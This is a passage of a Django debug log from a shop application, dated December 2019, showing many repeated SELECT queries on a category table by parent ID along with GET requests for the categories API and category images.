"shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-19 13:29:55,193 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-19 13:29:55,195 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-19 13:29:55,198 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-19 13:29:55,201 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-19 13:29:55,204 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-19 13:29:55,206 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [19/Dec/2019 13:29:55] "GET /api/v1/categories/ HTTP/1.0" 200 15396 [19/Dec/2019 13:30:02] "GET /media/categories/2019/12/13/collection10.png HTTP/1.0" 200 387799 [19/Dec/2019 13:30:04] "GET /media/categories/2019/12/07/collection10.png HTTP/1.0" 200 387799 [19/Dec/2019 13:30:05] "GET /media/categories/2019/12/07/collection6.png HTTP/1.0" 200 600645 [19/Dec/2019 13:30:06] "GET /media/categories/2019/12/07/collection2.png HTTP/1.0" 200 466113 [19/Dec/2019 13:30:09] "GET /media/categories/2019/12/07/collection3.png HTTP/1.0" 200 784410 [19/Dec/2019 13:30:10] "GET /media/categories/2019/12/07/collection7.png HTTP/1.0" 200 379075 [19/Dec/2019 13:30:11] "GET /media/categories/2019/12/07/collection4.png HTTP/1.0" 200 432480 [19/Dec/2019 13:30:13] "GET /media/categories/2019/12/07/collection8.png HTTP/1.0" 200 376652 [19/Dec/2019 13:30:13] "GET /media/categories/2019/12/07/collection5.png HTTP/1.0" 200 454674 [19/Dec/2019 13:30:13] "GET /media/categories/2019/12/07/collection1.png HTTP/1.0" 200 793553 [19/Dec/2019 13:30:16] "GET /media/categories/2019/12/07/collection9.png HTTP/1.0" 200 284188 DEBUG 2019-12-19 13:30:37,719 utils 4252 140031747061504 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-19 13:30:37,726 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-19 13:30:37,730 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-19 13:30:37,732 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-19 13:30:37,735 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-19 13:30:37,737 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-19 13:30:37,740 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-19 13:30:37,742 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-19 13:30:37,744 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-19 13:30:37,749 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-19 13:30:37,751 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-19 13:30:37,754 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-19 13:30:37,757 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-19 13:30:37,760 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-19 13:30:37,764 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-19 13:30:37,767 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-19 13:30:37,770 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-19 13:30:37,773 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-19 13:30:37,776 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-19 13:30:37,780 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-19 13:30:37,783 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-19 13:30:37,786 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-19 13:30:37,789 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-19 13:30:37,792 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-19 13:30:37,795 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-19 13:30:37,799 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-19 13:30:37,802 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-19 13:30:37,805 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-19 13:30:37,807 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-19 13:30:37,810 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-19 13:30:37,815 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-19 13:30:37,818 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-19 13:30:37,821 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-19 13:30:37,824 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-19 13:30:37,827 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-19 13:30:37,832 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-19 13:30:37,835 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-19 13:30:37,838 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-19 13:30:37,841 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-19 13:30:37,843 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-19 13:30:37,846 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-19 13:30:37,850 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-19 13:30:37,853 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-19 13:30:37,856 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-19 13:30:37,859 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-19 13:30:37,862 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [19/Dec/2019 13:30:37] "GET /api/v1/categories/ HTTP/1.0" 200 15396 DEBUG 2019-12-19 13:30:37,982 utils 4252 140031747061504 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."id" = 12; args=(12,) DEBUG 2019-12-19 13:30:37,987 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) [19/Dec/2019 13:30:37] "GET /api/v1/categories/12 HTTP/1.0" 200 209 DEBUG 2019-12-19 13:30:38,283 utils 4252 140031747061504 (0.005) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-19 13:30:38,295 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-19 13:30:38,302 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-19 13:30:38,306 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-19 13:30:38,312 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-19 13:30:38,316 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-19 13:30:38,320 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-19 13:30:38,324 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-19 13:30:38,328 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-19 13:30:38,335 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-19 13:30:38,339 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", 